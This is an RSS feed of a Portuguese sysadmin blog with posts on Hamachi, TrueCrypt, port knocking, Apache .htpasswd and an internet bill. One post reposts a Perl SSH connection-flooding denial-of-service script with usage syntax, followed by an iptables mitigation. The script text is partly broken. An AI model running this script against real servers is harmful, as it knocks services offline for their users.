<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Source Free</title>
	<atom:link href="http://sourcefree.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://sourcefree.wordpress.com</link>
	<description></description>
	<lastBuildDate>Wed, 28 Jan 2009 02:35:07 +0000</lastBuildDate>
	<language>pt-br</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='sourcefree.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Source Free</title>
		<link>http://sourcefree.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://sourcefree.wordpress.com/osd.xml" title="Source Free" />
	<atom:link rel='hub' href='http://sourcefree.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Hamachi</title>
		<link>http://sourcefree.wordpress.com/2009/01/27/hamachi/</link>
		<comments>http://sourcefree.wordpress.com/2009/01/27/hamachi/#comments</comments>
		<pubDate>Wed, 28 Jan 2009 02:35:07 +0000</pubDate>
		<dc:creator>sourcefree</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Segurança]]></category>

		<guid isPermaLink="false">http://sourcefree.wordpress.com/?p=20</guid>
		<description><![CDATA[Hamachi, software para criação de VPNs criptografadas com facilidade.<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sourcefree.wordpress.com&amp;blog=3455691&amp;post=20&amp;subd=sourcefree&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Apesar do nome estranho, esse programa é muito útil, ele cria VPNs criptografadas com muita facilidade.</p>
<p>Algumas distros como Arch Linux tem este programa no repositório mas as derivadas de debian não, mas ele pode ser encontrado em <a href="https://secure.logmein.com/products/hamachi/list.asp">hamachi</a> e é facilmente instalável.</p>
<p>Após instalado, no linux, você deve rodar o comando tuncfg como root.<br />
Na primeira vez que ele é utilizado, você deve rodar o comando <strong><span style="color:#cc6600;">hamachi-init</span></strong>, para cada usuário diferente esse comando deverá ser rodado na primeira inicialização do hamachi, para criar as chaves RSA de criptografia. Após criada as chaves na /home do usuário, digite o comando <strong><span style="color:#cc6600;">hamachi</span> <span style="color:#ffffff;">start</span></strong> para iniciar o mesmo. Após iniciado você precisa se logar no servidor deles, faça isso com <strong><span style="color:#cc6600;">hamachi</span> <span style="color:#ffffff;">login</span></strong> Ao se logar você já está apto a se conectar a uma vpn, podendo fazer isso com <strong><span style="color:#cc6600;">hamachi</span> <span style="color:#ffffff;">join NOME_DA_REDE SENHA</span></strong> </p>
<p>Pronto você já esta na rede, porém não está online na mesma ainda, para isso digite <strong><span style="color:#cc6600;">hamachi</span> <span style="color:#ffffff;">go-online NOME_DA_REDE</span></strong> para ficar online ou <strong><span style="color:#cc6600;">hamachi</span> <span style="color:#ffffff;">go-offline NOME_DA_REDE</span></strong> para ficar offline.</p>
<p>Você pode verificar o seu status digitando <strong><span style="color:#cc6600;">hamachi</span> <span style="color:#ffffff;">list</span></strong> ele mostrará o nome da rede entre colchetes, e abaixo identado quem pertence a rede, você pode perceber alguns <strong><span style="color:#ffffff;">*</span></strong> do lado do nome da rede ou do lado dos integrantes, esse * significa que o integrante está online, e ao lado do nome da rede significa que você está online na mesma.</p>
<p>Você pode criar sua própria rede com <strong><span style="color:#cc6600;">hamachi</span> <span style="color:#ffffff;">create NOME_DA_REDE SENHA</span></strong> , caso não exista nenhuma outra rede com o mesmo nome, sua rede será criada com a senha passada. </p>
<p>Para acessar os computadores da vpn, utilize os ips mostrados pelo comando <strong><span style="color:#cc6600;">hamachi</span> <span style="color:#ffffff;">list</span></strong>, normalmente começa por <strong><span style="color:#ffffff;">5.***.***.***</span></strong> o seu ip pode ser visto na interface de rede criada por ele, <strong><span style="color:#ffffff;">ham0</span></strong>.</p>
<p>Qualquer dúvida, <strong><span style="color:#cc6600;">hamachi</span> <span style="color:#ffffff;">help</span></strong> mostra todos os comandos</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sourcefree.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/sourcefree.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sourcefree.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/sourcefree.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sourcefree.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/sourcefree.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sourcefree.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/sourcefree.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sourcefree.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/sourcefree.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sourcefree.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/sourcefree.wordpress.com/20/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sourcefree.wordpress.com/20/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/sourcefree.wordpress.com/20/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sourcefree.wordpress.com&amp;blog=3455691&amp;post=20&amp;subd=sourcefree&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://sourcefree.wordpress.com/2009/01/27/hamachi/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/eebeee09364c59db6c6b7e5291f6b8a9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">sourcefree</media:title>
		</media:content>
	</item>
		<item>
		<title>Projeto do Senador Eduardo Azeredo</title>
		<link>http://sourcefree.wordpress.com/2008/09/01/lei-internet/</link>
		<comments>http://sourcefree.wordpress.com/2008/09/01/lei-internet/#comments</comments>
		<pubDate>Mon, 01 Sep 2008 21:43:40 +0000</pubDate>
		<dc:creator>sourcefree</dc:creator>
				<category><![CDATA[Internet]]></category>

		<guid isPermaLink="false">http://sourcefree.wordpress.com/?p=14</guid>
		<description><![CDATA[O Senador Eduardo Azeredo pretende com a aprovação de sua lei, realizar cadastros de todos os usuários que utilizam a internet, acabando com o anonimato na internet, e com utilizações de redes públicas, sendo que também necessitariam de cadastro para cada usuário que se conectase. Este projeto está sendo altamente debatido em diversos meios de [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sourcefree.wordpress.com&amp;blog=3455691&amp;post=14&amp;subd=sourcefree&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>O Senador Eduardo Azeredo pretende com a aprovação de sua lei, realizar cadastros de todos os usuários que utilizam a internet, acabando com o anonimato na internet, e com utilizações de redes públicas, sendo que também necessitariam de cadastro para cada usuário que se conectase.</p>
<p>Este projeto está sendo altamente debatido em diversos meios de comunicação, principalmente a internet. Existindo uma petição no safernet exigindo que a audiência do projeto seja pública, para termos o direito de reivindicar nossos direitos na internet.</p>
<p>Segue matéria sobre a lei e todos os detalhes da mesma: http://www.safernet.org.br/twiki/bin/view/SaferNet/Noticia20080711045713</p>
<p>Segue o link para a petição solciitando a audiência pública: http://peticoes.safernet.org.br/projeto_lei_azeredo</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/sourcefree.wordpress.com/14/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/sourcefree.wordpress.com/14/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sourcefree.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/sourcefree.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sourcefree.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/sourcefree.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sourcefree.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/sourcefree.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sourcefree.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/sourcefree.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sourcefree.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/sourcefree.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sourcefree.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/sourcefree.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sourcefree.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/sourcefree.wordpress.com/14/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sourcefree.wordpress.com&amp;blog=3455691&amp;post=14&amp;subd=sourcefree&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://sourcefree.wordpress.com/2008/09/01/lei-internet/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/eebeee09364c59db6c6b7e5291f6b8a9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">sourcefree</media:title>
		</media:content>
	</item>
		<item>
		<title>DOS no SSH</title>
		<link>http://sourcefree.wordpress.com/2008/04/12/dos-no-ssh/</link>
		<comments>http://sourcefree.wordpress.com/2008/04/12/dos-no-ssh/#comments</comments>
		<pubDate>Sat, 12 Apr 2008 03:08:56 +0000</pubDate>
		<dc:creator>sourcefree</dc:creator>
				<category><![CDATA[Segurança]]></category>

		<guid isPermaLink="false">http://sourcefree.wordpress.com/?p=5</guid>
		<description><![CDATA[Encontrei um script em perl que realiza DOS (Denial of Service) no SSH. Segue abaixo o script: #!/usr/bin/perl ## I needed a working test script so here it is. ## just a keep alive thread, I had a few problems with Pablo&#8217;s code #running properly. ## ## Straight from Pablo Fernandez&#8217;s advisory: # Vulnerable code [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sourcefree.wordpress.com&amp;blog=3455691&amp;post=5&amp;subd=sourcefree&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Encontrei um script em perl que realiza DOS (Denial of Service) no SSH.</p>
<p>Segue abaixo o script:</p>
<p>#!/usr/bin/perl<br />
## I needed a working test script so here it is.<br />
## just a keep alive thread, I had a few problems with Pablo&#8217;s code<br />
#running properly.<br />
##<br />
## Straight from Pablo Fernandez&#8217;s advisory:<br />
# Vulnerable code is in svr-main.c<br />
#<br />
# /* check for max number of connections not authorised */<br />
# for (j = 0; j &lt; MAX_UNAUTH_CLIENTS; j++) {<br />
#        if (childpipes[j]  $serv,<br />
	PeerPort =&gt; $port,<br />
	Proto =&gt; &#8216;tcp&#8217;,<br />
	);</p>
<p>	die &#8220;Could not create socket: $!\n&#8221; unless $sock;<br />
	sleep $sleep;<br />
	close($sock);<br />
}</p>
<p>sub thread {<br />
	my $i=1;<br />
	print &#8220;Server: $serv\nPort: $port\nSeconds: $time\n&#8221;;<br />
	while($i &lt; 51){<br />
		print &#8220;.&#8221;;<br />
		my $thr = new Thread \&amp;exploit, $serv, $port, $time;<br />
		$i++;<br />
	}<br />
	sleep $time; #detach wouldn&#8217;t be good<br />
}</p>
<p>if (@ARGV != 3){&usage;}else{&thread;}</p>
<p>a sintaxe é a seguinte ./script ip_host porta_ssh tempo_offline</p>
<p>Esse script faz basicamente o seguinte, ele utiliza os argumentos passados na execução, para criar conexões em servidores na porta escolhida, ele gera 51 conexões simultâneas, o OpenSSH por padrão limita a 10 conexões simultâneas, ou seja depois da décima conexão ele começa a recusar novas conexões. E o script deixa as conexões ativas durante o tempo determinado no terceiro argumento.</p>
<p>Esse tipo de DOS e outros que funcionam da mesma forma podem ser resolvidos com uma regra no iptables.</p>
<p>Essa regra se aplica quando a politica do INPUT está definida como DROP.</p>
<p><span style="color:#cc6600;"># iptables -A INPUT -p tcp &#8211;dport 22 -m limit &#8211;limit 1/sec -j ACCEPT </span></p>
<p>essa regra faz o seguinte, ele libera conexões na porta 22/tcp com um intervalo entre elas maior de 1 segundo, todas as conexões na porta 22 que ocorrerm em menos de um segundo serão bloqueadas. Logo as 51 conexões do script não seriam aceitas, anulando a ação do script.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/sourcefree.wordpress.com/5/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/sourcefree.wordpress.com/5/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sourcefree.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/sourcefree.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sourcefree.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/sourcefree.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sourcefree.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/sourcefree.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sourcefree.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/sourcefree.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sourcefree.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/sourcefree.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sourcefree.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/sourcefree.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sourcefree.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/sourcefree.wordpress.com/5/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sourcefree.wordpress.com&amp;blog=3455691&amp;post=5&amp;subd=sourcefree&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://sourcefree.wordpress.com/2008/04/12/dos-no-ssh/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/eebeee09364c59db6c6b7e5291f6b8a9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">sourcefree</media:title>
		</media:content>
	</item>
		<item>
		<title>TrueCrypt</title>
		<link>http://sourcefree.wordpress.com/2008/04/11/truecrypt/</link>
		<comments>http://sourcefree.wordpress.com/2008/04/11/truecrypt/#comments</comments>
		<pubDate>Sat, 12 Apr 2008 02:48:32 +0000</pubDate>
		<dc:creator>sourcefree</dc:creator>
				<category><![CDATA[Segurança]]></category>

		<guid isPermaLink="false">http://sourcefree.wordpress.com/?p=4</guid>
		<description><![CDATA[Truecrypt é um prorgama utilizado para criptografar partições inteiras, ou no meu caso pendrive. No site é possivel fazer download do aplicativo tanto pra win quanto pra linux. O arquivo pra linux está no formato .tar.gz que contém ou um pacote .deb ou .rpm. No meu pc to usando o Ubuntu 7.04, então utilizarei o [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sourcefree.wordpress.com&amp;blog=3455691&amp;post=4&amp;subd=sourcefree&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Truecrypt é um prorgama utilizado para criptografar partições inteiras, ou no meu caso pendrive.</p>
<p>No site é possivel fazer download do aplicativo tanto pra win quanto pra linux. O arquivo pra linux está no formato .tar.gz que contém ou um pacote .deb ou .rpm. No meu pc to usando o Ubuntu 7.04, então utilizarei o .deb.</p>
<p># tar -zxvf truecrypt-4.3a-ubuntu-7.04-x86.tar.gz<br />
# cd truecrypt-4.3a/<br />
# dpkg -i truecrypt_4.3a-0_i386.deb</p>
<p>Criando a partição criptografada como usuário normal:</p>
<p># truecrypt -c /dev/sda<br />
Volume type:<br />
1) Normal<br />
2) Hidden<br />
Select [1]: 1</p>
<p>WARNING: Data on device will be lost. Continue? [y/N]: y<br />
Filesystem:<br />
1) FAT<br />
2) None<br />
Select [1]: 1</p>
<p>Hash algorithm:<br />
1) RIPEMD-160<br />
2) SHA-1<br />
3) Whirlpool<br />
Select [1]: 1</p>
<p>Encryption algorithm:<br />
1) AES<br />
2) Blowfish<br />
3) CAST5<br />
4) Serpent<br />
5) Triple DES<br />
6) Twofish<br />
7) AES-Twofish<br />
8) AES-Twofish-Serpent<br />
9) Serpent-AES<br />
10) Serpent-Twofish-AES<br />
11) Twofish-Serpent<br />
Select [1]: 1</p>
<p>Enter password for new volume &#8216;/dev/sda&#8217;:<br />
Re-enter password:</p>
<p>Enter keyfile path [none]:</p>
<p>TrueCrypt will now collect random data.</p>
<p>To enable mouse movements to be used as a source of random data,<br />
please do one of the following:<br />
- Run TrueCrypt under administrator (root) account.<br />
- Add read permission for your user to device /dev/input/mice.</p>
<p>Please type at least 320 randomly chosen characters and then press Enter:</p>
<p>Done: 1000.00 MB Speed: 16.25 MB/s Left: 0:00:00<br />
Volume created.</p>
<p>Criando a partição criptografada como root:</p>
<p># truecrypt -c /dev/sda<br />
Volume type:<br />
1) Normal<br />
2) Hidden<br />
Select [1]: 1</p>
<p>WARNING: Data on device will be lost. Continue? [y/N]: y<br />
Filesystem:<br />
1) FAT<br />
2) None<br />
Select [1]: 1</p>
<p>Hash algorithm:<br />
1) RIPEMD-160<br />
2) SHA-1<br />
3) Whirlpool<br />
Select [1]: 1</p>
<p>Encryption algorithm:<br />
1) AES<br />
2) Blowfish<br />
3) CAST5<br />
4) Serpent<br />
5) Triple DES<br />
6) Twofish<br />
7) AES-Twofish<br />
8) AES-Twofish-Serpent<br />
9) Serpent-AES<br />
10) Serpent-Twofish-AES<br />
11) Twofish-Serpent<br />
Select [1]: 1</p>
<p>Enter password for new volume &#8216;/dev/sda&#8217;:<br />
Re-enter password:</p>
<p>Enter keyfile path [none]:</p>
<p>Is your mouse connected directly to computer where TrueCrypt is running? [Y/n]:y</p>
<p>Please move the mouse randomly until the required amount of data is captured&#8230;<br />
Mouse data captured: 100%</p>
<p>Done: 1000.00 MB Speed: 14.25 MB/s Left: 0:00:00<br />
Volume created.</p>
<p>Montando a partição:</p>
<p># truecrypt -u /dev/sda /media/truecrypt</p>
<p>Enter user&#8217;s or root&#8217;s system password:<br />
Enter password for &#8216;/dev/sda&#8217;:</p>
<p># truecrypt -l<br />
/dev/mapper/truecrypt0 /dev/sda</p>
<p>Montado</p>
<p>Desmontando a partição:</p>
<p># truecrypt -d /dev/sda</p>
<p># truecrypt -l<br />
No volumes mapped</p>
<p>Desmontado</p>
<p>Pronto agora seu pendrive está criptografado =)<br />
Qualquer dúvida:</p>
<p># man truecrypt</p>
<p>ou comentem</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/sourcefree.wordpress.com/4/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/sourcefree.wordpress.com/4/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sourcefree.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/sourcefree.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sourcefree.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/sourcefree.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sourcefree.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/sourcefree.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sourcefree.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/sourcefree.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sourcefree.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/sourcefree.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sourcefree.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/sourcefree.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sourcefree.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/sourcefree.wordpress.com/4/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sourcefree.wordpress.com&amp;blog=3455691&amp;post=4&amp;subd=sourcefree&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://sourcefree.wordpress.com/2008/04/11/truecrypt/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/eebeee09364c59db6c6b7e5291f6b8a9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">sourcefree</media:title>
		</media:content>
	</item>
		<item>
		<title>Port Knocking</title>
		<link>http://sourcefree.wordpress.com/2008/04/11/port-knocking/</link>
		<comments>http://sourcefree.wordpress.com/2008/04/11/port-knocking/#comments</comments>
		<pubDate>Sat, 12 Apr 2008 02:43:48 +0000</pubDate>
		<dc:creator>sourcefree</dc:creator>
				<category><![CDATA[Segurança]]></category>

		<guid isPermaLink="false">http://sourcefree.wordpress.com/?p=3</guid>
		<description><![CDATA[Bom esse post explica como fazer um Port Knocking com Iptables. Port Knocking seria mais ou menos liberar uma porta no iptables caso seu ip esteja numa lista, caso contrário deixá-la bloqueada. O exemplo que vou usar será o do ssh. Antes de mais nada verifique se seu kernel possui o módulo ipt_recent # modprobe [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sourcefree.wordpress.com&amp;blog=3455691&amp;post=3&amp;subd=sourcefree&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Bom esse post explica como fazer um Port Knocking com Iptables.</p>
<p>Port Knocking seria mais ou menos liberar uma porta no iptables caso seu ip esteja numa lista, caso contrário deixá-la bloqueada.</p>
<p>O exemplo que vou usar será o do ssh.</p>
<p>Antes de mais nada verifique se seu kernel possui o módulo ipt_recent<br />
# modprobe -l | grep recent</p>
<p>se a saida do comando for parecida com<br />
<span style="font-style:italic;color:#cc6600;">/lib/modules/2.6.20-15-generic/kernel/net/ipv4/netfilter/ipt_recent.ko</span></p>
<p>você não precisará compilar seu kernel.Agora suba o módulo<br />
# modprobe ipt_recent</span></p>
<p>Agora crie um arquivo, o nome que utilizarei é <span style="font-style:italic;">pknock.sh e adicione ao seu conteúdo</span></p>
<p>Obs: As portas e o nome da lista podem e devem ser alterados para maior segurança.</p>
<p><span style="color:#cc6600;">#!/bin/bash</span><br />
<span style="color:#3333ff;"># bloqueia a porta do ssh, no caso a 2000</span> <span style="color:#cc6600;">iptables -A INPUT -p tcp -s 0/0 &#8211;dport 2000 -j DROP<br />
<span style="color:#3333ff;"># libera a porta do ssh caso o ip esteja na lista SSHKNOCK</span> </span><span style="color:#cc6600;">iptables -I INPUT -p tcp -s 0/0 &#8211;sport 1024:65535 &#8211;dport 2000 -m recent &#8211;rsource &#8211;name SSHKNOCK &#8211;rcheck -j ACCEPT<br />
<span style="color:#3333ff;"># ao se conectar na porta 2100 adiciona o ip na lista SSHKNOCK</span> </span><span style="color:#cc6600;">iptables -I INPUT -p tcp -s 0/0 &#8211;sport 1024:65535 &#8211;dport 2100 -m recent &#8211;rsource &#8211;set &#8211;name SSHKNOCK -j DROP<br />
<span style="color:#3333ff;"># ao se conectar na porta 2200 retira o ip da lista SSHKNOCK</span> </span><span style="color:#cc6600;">iptables -I INPUT -p tcp -s 0/0 &#8211;sport 1024:65535 &#8211;dport 2200 -m recent &#8211;rsource &#8211;name SSHKNOCK &#8211;remove -j DROP</span></p>
<p>salve o arquivo.</p>
<p>Agora para aplicar as regras ao iptables sempre que iniciar, no ubuntu edite o arquivo /etc/rc.local como root</p>
<p># pico /etc/rc.local</p>
<p>antes da linha &#8220;exit 0&#8243;<br />
adicione bash /home/user/pknock.sh</p>
<p>troque isso pela localização exata no teu pc.</p>
<p>salve o arquivo rc.local</p>
<p>Agora de permissão de execução para ele:<br />
# chmod +x /etc/rc.local</p>
<p>Agora sempre que inicar seu pc as regras já estarão no iptables.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/sourcefree.wordpress.com/3/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/sourcefree.wordpress.com/3/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sourcefree.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/sourcefree.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sourcefree.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/sourcefree.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sourcefree.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/sourcefree.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sourcefree.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/sourcefree.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sourcefree.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/sourcefree.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sourcefree.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/sourcefree.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sourcefree.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/sourcefree.wordpress.com/3/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sourcefree.wordpress.com&amp;blog=3455691&amp;post=3&amp;subd=sourcefree&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://sourcefree.wordpress.com/2008/04/11/port-knocking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/eebeee09364c59db6c6b7e5291f6b8a9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">sourcefree</media:title>
		</media:content>
	</item>
		<item>
		<title>Protegendo pastas do Apache com senha</title>
		<link>http://sourcefree.wordpress.com/2008/04/11/apache-senha/</link>
		<comments>http://sourcefree.wordpress.com/2008/04/11/apache-senha/#comments</comments>
		<pubDate>Fri, 11 Apr 2008 11:26:04 +0000</pubDate>
		<dc:creator>sourcefree</dc:creator>
				<category><![CDATA[Segurança]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Hoje eu tive que colocar senha numa pasta do apache e como nunca tinha feito isso tive que correr atrás no google. Então axei um site que me ajudou muito Então adaptando um pouco lá vai: entre na pasta do apache que deseja proteger, por exemplo /var/www/pasta_com_senha/ utilize o comando abaixo para criar o arquivo [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=sourcefree.wordpress.com&amp;blog=3455691&amp;post=1&amp;subd=sourcefree&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<h3 class="post-title entry-title"><a href="http://linuxfreedom.blogspot.com/2007/08/protegendo-pastas-do-apache-com-senha.html"><br />
</a></h3>
<p>Hoje eu tive que colocar senha numa pasta do apache e como nunca tinha feito isso tive que correr atrás no google. Então axei um <a href="http://www.bestlinux.com.br/index.php?option=com_content&amp;task=view&amp;id=1604&amp;Itemid=145">site</a> que me ajudou muito</p>
<p>Então adaptando um pouco lá vai:</p>
<p>entre na pasta do apache que deseja proteger, por exemplo /var/www/pasta_com_senha/</p>
<p>utilize o comando abaixo para criar o arquivo com a senha</p>
<p><span style="color:#cc9933;"># htpasswd -c /var/www/pasta_com_senha/.htpasswd web</span></p>
<p>Explicando:</p>
<p><span style="color:#cc9933;">/var/www/pasta_com_senha/.htpasswd é o arquivo que armazena a senha, você pode utilizar o nome que quiser porém por questões de segurança sempre o mantenha oculto. Obrigatoriamente ele deve estar na pasta que você deseja proteger.</span></p>
<p><span style="color:#cc9933;">web é o usuário que vai acessar a pasta, você pode escolher qualquer usuário.</span><br />
